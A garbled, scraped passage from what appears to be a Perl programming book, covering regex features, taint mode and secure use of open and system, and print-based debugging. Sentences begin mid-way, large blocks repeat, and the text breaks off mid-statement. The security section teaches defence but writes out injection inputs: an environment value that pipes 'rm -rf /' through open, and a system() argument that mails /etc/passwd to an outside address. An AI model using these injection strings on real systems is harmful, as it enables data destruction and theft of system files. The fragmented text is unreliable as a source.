Cover | Table of Contents | Colophon
grep’s job. It takes the
firstF argument from the command line and uses it as the regex in the
while statement. That’s nothing special
(yet); we showed you how to do this in Learning Perl. I can use the string
in $regex as my pattern, and Perl
compiles it when it interpolates the string in the match
operator:#!/usr/bin/perl
# perl-grep.pl
my $regex = shift @ARGV;
print "Regex is [$regex]\n";
while( <> )
{
print if m/$regex/;
}new in all of the Perl programs in the current
directory:% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
[ qr/\G(\n)/, "newline" ],
{ ( $1, "newline char" ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/
at ./perl-grep.pl line 10, <> line 1.grep’s job. It takes the
firstF argument from the command line and uses it as the regex in the
while statement. That’s nothing special
(yet); we showed you how to do this in Learning Perl. I can use the string
in $regex as my pattern, and Perl
compiles it when it interpolates the string in the match
operator:#!/usr/bin/perl
# perl-grep.pl
my $regex = shift @ARGV;
print "Regex is [$regex]\n";
while( <> )
{
print if m/$regex/;
}new in all of the Perl programs in the current
directory:% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
[ qr/\G(\n)/, "newline" ],
{ ( $1, "newline char" ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/
at ./perl-grep.pl line 10, <> line 1.qr// is a regex quoting operator that stores my regex in a scalar (and as a
quoting operator, its documentation shows up in
perlop). The qr//
compiles the pattern so it’s ready to use when I interpolate $regex in the match operator. I wrap the
eval operator around the qr// to catch the error, even though I end up
die-ing anyway:#!/usr/bin/perl
# perl-grep2.pl
my $pattern = shift @ARGV;
my $regex = eval { qr/$pattern/ };
die "Check your pattern! $@" if $@;
while( <> )
{
print if m/$regex/;
}
(?:PATTERN). This way, I don’t get unwanted data
in my capturing groups.and or or. In @array
I have some strings that express pairs. The conjunction may change, so in
my regex I use the alternation and|or.
My problem is precedence. The alternation is higher precedence than sequence, so I
need to enclose the alternation in parentheses, (\S+) (and|or)
(\S+), to make it work:#!/usr/bin/perl
my @strings = (
"Fred and Barney",
"Gilligan or Skipper",
"Fred and Ginger",
);
foreach my $string ( @strings )
{
# $string =~ m/(\S+) and|or (\S+)/; # doesn't work
$string =~ m/(\S+) (and|or) (\S+)/;
print "\$1: $1\n\$2: $2\n\$3: $3\n";
print "-" x 10, "\n";
}
$2 (). That’s an artifact.Not grouping and|or | Grouping and|or |
|---|---|
$1: Fred $2: $3: ---------- $1: $2: Skipper $3: ---------- $1: Fred $2: $3: ---------- | $1: Fred $2: and $3: Barney ---------- $1: Gilligan $2: or $3: Skipper ---------- $1: Fred $2: and $3: Ginger ---------- |
@names:# extra element! my @names = ( $string =~ m/(\S+) (and|or) (\S+)/ );
?: right after the opening parenthesis of the
group, which turns them into noncapturing parentheses. Instead of (and|or), I now have (?:and|or). This form doesn’t trigger the
memory variables, and they don’t count toward the numbering of the memory
variables either. I can apply quantifiers just like the plain parentheses
as well. Now I don’t get my extra element in /x flag to either
the match or substitution operators, Perl ignores literal whitespace in
the pattern. This means that I spread out the parts of my pattern to make
the pattern more discernible. Gisle Aas’s HTTP::Date module parses a
date by trying several different regexes. Here’s one of his regular
expressions, although I’ve modified it to appear on a single line, wrapped
to fit on this page:/^(\d\d?)(?:\s+|[-\/])(\w+)(?:\s+|[-\/])↲
(\d+)(?:(?:\s+|:)(\d\d?):(\d\d)(?::(\d\d))↲
?)?\s*([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)?\s*(?:\(\w+\))?\s*$//x
flag to break apart the regex and add comments to show me what each piece
of the pattern does. With /x, Perl
ignores literal whitespace and Perl-style comments inside the regex.
Here’s Gisle’s actual code, which is much easier to understand: /^
(\d\d?) # day
(?:\s+|[-\/])
(\w+) # month
(?:\s+|[-\/])
(\d+) # year
(?:
(?:\s+|:) # separator before clock
(\d\d?):(\d\d) # hour:min
(?::(\d\d))? # optional seconds
)? # optional clock
\s*
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
\s*
(?:\(\w+\))? # ASCII representation of timezone in parens.
\s*$
/x
/g
flag that you can use to make all possible substitutions, but
it’s more useful than that. I can use it with the match operator, where it
does different things in scalar and list context. We told you that the
match operator returns true if it matches and false otherwise. That’s
still true (we wouldn’t have lied to you), but it’s not just a boolean
value. The list context behavior is the most useful. With the /g flag, the match operator returns all of the
memory matches:$_ = "Just another Perl hacker,"; my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"
my $word_count = () = /(\S+)/g;
() in there./g flag
does some extra work we didn’t tell you about earlier. During a successful
match, Perl remembers its position in the string, and when I match against
that same string again, Perl starts where it left off in that string. It
returns the result of one application of the pattern to the string:$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"
while( /(\S+)/g ) # scalar context
{
print "Next word is '$1'\n";
}
Next word is 'Just' Next word is 'another' Next word is 'Perl' Next word is 'hacker,'
^, $, and
\b, and I just showed the \G anchor. Using a lookaround, I can describe my
own anchor as a regex, and just like the other anchors, they don’t count
as part of the pattern or consume part of the string. They specify a
condition that must be true, but they don’t add to the part of the string
that the overall pattern matches.Wilma and Fred in the alternation so I can try either
order. A second try separates them into two regexes:#/usr/bin/perl # fred-and-wilma.pl $_ = "Here come Wilma and Fred!"; print "Matches: $_" if /Fred.*Wilma|Wilma.*Fred/; print "Matches: $_" if /Fred/ && /Wilma/;
-D switch turns on debugging options for the Perl interpreter (not
for your program, as in ). The switch takes a
series of letters or numbers to indicate what it should turn on. The
-Dr option turns on regex parsing and
execution debugging.#!/usr/bin/perl $ARGV[0] =~ /$ARGV[1]/;
Just
another Perl hacker, and the regex Just
another (\S+) hacker,, I see two major sections of output, which
the perldebguts documentation explains at
length. First, Perl compiles the regex, and the -Dr output shows how Perl parsed the regex. It
shows the regex nodes, such as EXACT
and NSPACE, as well as any
optimizations, such as anchored "Just another
". Second, it tries to match the target string, and shows its
progress through the nodes. It’s a lot of information, but it shows me
exactly what it’s doing:$ perl -Dr explain-regex 'Just another Perl hacker,' 'Just another (\S+) hacker,'
Omitting $` $& $' support.
EXECUTING...
Compiling REx `Just another (\S+) hacker,'
size 15 Got 124 bytes for offset annotations.
first at 1
rarest char k at 4
rarest char J at 0
1: EXACT <Just another >(6)
6: OPEN1(8)
8: PLUS(10)
9: NSPACE(0)
10: CLOSE1(12)
12: EXACT < hacker,>(15)
15: END(0)
anchored "Just another " at 0 floating " hacker," at 14..2147483647 (checking anchored) minlen 22
Offsets: [15]
1[13] 0[0] 0[0] 0[0] 0[0] 14[1] 0[0] 17[1] 15[2] 18[1] 0[0] 19[8] 0[0] 0[0] 27[0]
Guessing start of match, REx "Just another (\S+) hacker," against "Just another Perl hacker,"...
Found anchored substr "Just another " at offset 0...
Found floating substr " hacker," at offset 17...
Guessed: match at offset 0
Matching REx "Just another (\S+) hacker," against "Just another Perl hacker,"
Setting an EVAL scope, savestack=3
0 <> <Just another> | 1: EXACT <Just another >
13 <ther > <Perl ha> | 6: OPEN1
13 <ther > <Perl ha> | 8: PLUS
NSPACE can match 4 times out of 2147483647...
Setting an EVAL scope, savestack=3
17 < Perl> < hacker> | 10: CLOSE1
17 < Perl> < hacker> | 12: EXACT < hacker,>
25 <Perl hacker,> <> | 15: END
Match successful!
Freeing REx: `"Just another (\\S+) hacker,"'
\w (word characters), \d (digits), and the others denoted by slash
sequences. I can also use the POSIX character classes. I enclose those in
the square brackets with colons on both sides of the name:print "Found alphabetic character!\n" if $string =~ m/[:alpha:]/; print "Found hex digit!\n" if $string =~ m/[:xdigit:]/;
^,
after the first colon:print "Didn't find alphabetic characters!\n" if $string =~ m/[:^alpha:]/; print "Didn't find spaces!\n" if $string =~ m/[:^space:]/;
\p{Name} sequence (little
p) includes the characters for the named property, and the \P{Name} sequence (big P) is its
complement:print "Found ASCII character!\n" if $string =~ m/\p{IsASCII}/;
print "Found control characters!\n" if $string =~ m/\p{IsCntrl}/;
print "Didn't find punctuation characters!\n" if $string =~ m/\P{IsPunct}/;
print "Didn't find uppercase characters!\n" if $string =~ m/\P{IsUpper}/;
Regexp::Common module provides pretested and known-to-work regexes for, well,
common things such as web addresses, numbers, postal codes, and even
profanity. It gives me a multilevel hash %RE that has as its values regexes. If I don’t
like that, I can use its function interface:use Regexp::Common;
print "Found a real number\n" if $string =~ /$RE{num}{real}/;
print "Found a real number\n" if $string =~ RE_num_real;
Regexp::English, which uses a series of
chained methods to return an object that stands in for a regex. It’s
probably not something you want in a real program, but it’s fun to think
about:use Regexp::English;
my $regexp = Regexp::English->new
->literal( 'Just' )
->whitespace_char
->word_chars
->whitespace_char
->remember( \$type_of_hacker )
->word_chars
->end
->whitespace_char
->literal( 'hacker' );
$regexp->match( 'Just another Perl hacker,' );
print "The type of hacker is [$type_of_hacker]\n";
qr() quoting operator
lets me compile a regex for later and gives it back to me as a reference.
With the special (?) sequences, I can
make my regular expression much more powerful, as well as less
complicated. The \G anchor allows me
to anchor the next match where the last one left off, and using the
/c flag, I can try several possibilities without resetting the match
position if one of them fails.-Dr and re
'debug'.\x “Extended Formatting”
pride of place.open my($fh), $file or die "Could not open [$file]: $!";
$file and from where did its value come? In
real-life code reviews, I’ve seen people do such as using elements of
@ARGV or an environment variable,
neither of which I can control as the programmer:my $file = $ARGV[0];
# OR ===
my $file = $ENV{FOO_CONFIG}
open. Have you ever read all of the
400-plus lines of that entry in perlfunc, or
its own manual, perlopentut? There are so
many ways to open resources in Perl that it has its own documentation
page. Several of those ways involve opening a pipe to another
program:open my($fh), "wc -l *.pod |"; open my($fh), "| mail joe@example.com";
$file so I execute a pipe open instead
of a file open. That’s not so hard:$ perl program.pl "| mail joe@example.com" $ FOO_CONFIG="rm -rf / |" perl program
open my($fh), $file or die "Could not open [$file]: $!";
$file and from where did its value come? In
real-life code reviews, I’ve seen people do such as using elements of
@ARGV or an environment variable,
neither of which I can control as the programmer:my $file = $ARGV[0];
# OR ===
my $file = $ENV{FOO_CONFIG}
open. Have you ever read all of the
400-plus lines of that entry in perlfunc, or
its own manual, perlopentut? There are so
many ways to open resources in Perl that it has its own documentation
page. Several of those ways involve opening a pipe to another
program:open my($fh), "wc -l *.pod |"; open my($fh), "| mail joe@example.com";
$file so I execute a pipe open instead
of a file open. That’s not so hard:$ perl program.pl "| mail joe@example.com" $ FOO_CONFIG="rm -rf / |" perl program
open can do. It’s not going to be that
much more work than the careless method, and it will be one less thing I
have to worry about.-T switch, Perl marks
any data that come from outside the program as tainted, or insecure, and
Perl won’t let me use those data to interact with anything outside of the
program. This way, I can avoid several security problems that come with
communicating with other processes. This is all or nothing. Once I turn it
on, it applies to the whole program and all of the data.echo to print a message:#!/usr/bin/perl -T system qq|echo "Args are @ARGV"|;
PATH. By using only a
program name, system uses the PATH setting. Users can set that to anything they like
before they run my program, and I’ve allowed outside data to influence the
working of the program. When I run the program, Perl realizes that the
PATH string is tamper-able, so it stops
my program and reminds me about its insecurity:@ARGV to extract a filename. I use a character
class to specify exactly what I want. In this case, I only want letters,
digits, underscores, dots, and hyphens. I don’t want anything that might
be a directory separator:my( $file ) = $ARGV[0] =~ m/^([A-Z0-9_.-]+)$/ig;
my( $file ) = $ARGV[0] =~ m/(.*)/i;
\w and \W (and the POSIX version [:alpha:]), actually take their definitions from
the locales. As a clever cracker, I could manipulate the locale setting in
such a way to let through the dangerous characters I want to use. Instead
of the implicit range of characters from the shortcut, I should explicitly
state which characters I want. I can’t be too careful. It’s easier to list
the allowed characters and add ones that I miss than to list the forbidden
characters, since it also excludes problem characters I don’t know about
yet.system or exec with a single argument, Perl looks in the
argument for shell metacharacters. If it finds metacharacters, Perl passes the argument to the underlying
shell for interpolation. Knowing this, I could construct a shell command
that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call
to echo:system( "/bin/echo $message" );
$message does more than provide an argument to
echo. This string also terminates the
command by using a semicolon, then starts a mail command that uses
input redirection:'Hello World!'; mail joe@example.com < /etc/passwd
system and exec in the list form. In that case, Perl uses
the first argument as the program name and calls execvp directly, bypassing the shell and any
interpolation or translation it might do:system "/bin/echo", $message;
system does
not automatically trigger its list processing mode. If the array has only
one element, system only sees one
argument. If system sees any shell
metacharacters in that single scalar element, it passes the whole command
to the shell, special characters and all:@args = ( "/bin/echo $message" ); system @args; # single argument form still, might go to shell @args = ( "/bin/echo", $message ); system @args; # list form, which is fine.
$arg[0] twice, it really doesn’t. It’s a special
indirection object notation that turns on the list processing mode and
assumes that the first argument is the command name:system { $args[0] } @args;
system and exec talk about their security features.open built-in can do, and there is
even more in perlopentut.perl interpreters or programs is often
instructive.perl5db.pl. Since it is just a
program, I can use it as the basis for writing my own debuggers to suit my
needs, or I can use the interface perl5db.pl provides to configure its actions. That’s just the beginning,
though. I can write my own debugger or use one of the many debuggers created
by other Perl masters.strict and warnings.
I have the most trouble with smaller programs for which I don’t think I
need strict and then I make the stupid mistakes it
would have caught. I spend much more time than I should have tracking down
something Perl would have shown me instantly. Common mistakes seem to be
the hardest for me to debug. Learn from the master: don’t discount
strict or warnings for even small .strict and warnings turned
on from the command line:$ perl -Mstrict -Mwarnings program
strict and warnings.
I have the most trouble with smaller programs for which I don’t think I
need strict and then I make the stupid mistakes it
would have caught. I spend much more time than I should have tracking down
something Perl would have shown me instantly. Common mistakes seem to be
the hardest for me to debug. Learn from the master: don’t discount
strict or warnings for even small .strict and warnings turned
on from the command line:$ perl -Mstrict -Mwarnings program
print is my best debugger. I could load source into a debugger, set
some inputs and breakpoints, and watch what happens, but often I can
insert a couple of print statements and
simply run the program normally.I put braces around the variable so I can see any leading or
trailing whitespace:print "The value of var before is [$var]\n"; #... operations affecting $var; print "The value of var after is [$var]\n";
print
because I can do the same thing with warn, which sends
its output to standard error:warn "The value of var before is [$var]"; #... operations affecting $var; warn "The value of var after is [$var]";
warn message, it gives me the filename and line
number of the warn:The value of var before is [$var] at program.pl line 123.
Data::Dumper to show it. It handles hash and array
references just fine, so I use a different character, the angle brackets
in this case, to offset the output that comes from
Data::Dumper:use Data::Dumper qw(Dumper); warn "T